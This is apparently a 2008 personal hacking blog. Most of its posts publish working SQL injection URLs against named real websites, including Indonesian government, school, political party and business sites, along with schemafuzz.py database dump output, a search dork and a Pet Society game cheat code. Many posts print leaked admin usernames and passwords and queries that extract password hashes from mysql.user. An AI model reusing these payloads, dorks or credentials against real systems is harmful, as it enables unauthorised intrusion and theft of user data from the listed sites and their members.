viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, December 10, 2008

Pet Society - Hack Coins & Paw Points

6:41 PM Posted by viperfx07 6 comments
Tired of waiting for your paw points & coins to increase? Go see the videos and rage!!!

Hack Coins Video
Note: the code is: 840FFF85C12A0FF2
1st of all... tick all the boxes that is told u to do
2nd sell or buy anything *before us start the first scan*
and then do exactly what in the video

Download Cheat Engine: here

Hack Paw Points Video
Note: u can both hack ur paw points and ur trophies.... u can also do it...

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case, I'm tired of being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)
PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*
Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+]...

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when I was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.
PoC: http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo:...

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Database info:
[+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 20:20:43
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: broadsword
User: broadsword@localhost
Version: 4.1.22
[+] Dumping data from database "broadsword" Table "users"
[+] and Column(s) ['email', 'password']
[+] Number...

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.py
Admin page = http://www.highperformancesailing.com.au/admin/
Admin usr/pwd = admin:admin
Database info:
[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:12:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community
[Database]:...

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Admin page: http://www.westcare.com.au/admin/
[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:49:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost...

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shw
PoC = http://www.site.com/news.php?p=shw&id=[SQLi]
Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--
Database structure:
[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 18:08:49
[+] Proxy Not Given
[+] Gathering MySQL...

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]
Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--
Tools: RainbowCrack at irc.plain-text.info
Admin usr/pwd: admin:123qweasdzxc
Admin...

Sunday, November 16, 2008

[SQLi] http://www.dotaportal.com

10:14 AM Posted by viperfx07 No comments
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]
Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*
Database info:
[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 10:40:26
[+] Proxy Not Given
[+] Gathering MySQL Server...

Friday, November 14, 2008

[SQLi] http://www.bbpk.go.id

2:20 PM Posted by viperfx07 No comments
PoC: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=[SQLi]
Demo: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=5+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password,0xd),1+from+mos_users--"
Problem: can't decrypt passw...

[SQLi] http://www.gunungkidulkab.go.id

1:58 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0
Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.php
Problem: can't login?
[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:17:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost...

Monday, November 10, 2008

[SQLi] http://www.sulut.go.id

5:23 PM Posted by viperfx07 2 comments
Problem: Admin directory found, but it's forbidden...
Admin dir: http://www.sulut.go.id/admin/
Dump:
[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 16:48:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sulut
User: sulut@localhost
Version: 5.0.27
[+] Showing all databases...

Wednesday, October 29, 2008

[SQLi] http://seaedunet.seamolec.org

5:27 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0
[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:19:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--
[+]...

Monday, October 27, 2008

Here in Australia...

5:58 PM Posted by viperfx07 No comments
Wow man, every day is a busy day. Moving to another country is not an easy task for me. With an "unhuman" weather, I've already got sick these days, sore throat and runny nose.

So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. In here, I can't download as much as I did in Indonesia (poor me). I think Indonesia is better...

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07 No comments
Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL...

[SQLi] http://www.buturnews.idrap.or.id

3:14 PM Posted by viperfx07 No comments
Tool --> blindext.py v5.0
User login --> buturnews:banda1302 (see else in dump)
Dump:
[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t79166_dbbutur"
[+] 10:12:30
[+]...

[SQLi] http://www.jiwasraya.co.id

2:30 PM Posted by viperfx07 No comments
Admin login page --> http://www.jiwasraya.co.id/admin/
Admin usr:pwd --> admin:ari1007 (see else in dump)
Dump:
[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 09:51:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration......

[SQLi] http://mobile.kompas.com

1:06 AM Posted by viperfx07 No comments
I try to get the full schema of kompas.com but I'm too tired, and it's too many. If you're so eager to "hack", try to get them all :)
Info:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:59:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version:...

Tuesday, October 14, 2008

[SQLi] http://www.gontha.com/

11:10 PM Posted by viperfx07 No comments
Tool --> schemafuzz.py v5.0
Admin login page --> http://www.gontha.com/admin/
Admin usr:pwd --> sai:saiman
Dump:
[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 18:57:14
[+]...

[SQLi] http://golkar.go.id

5:43 PM Posted by viperfx07 No comments
Tool --> schemafuzz v5.0
Dump:
[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--
[+]...

[SQLi] http://en.agrimedia.com/

12:57 AM Posted by viperfx07 No comments
Tool --> schemafuzz.py v5.0
Admin login page --> http://en.agrimedia.com/admin/
Admin usr:login --> admin:agri8z3 (see else in dump)
Dump:
[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/"...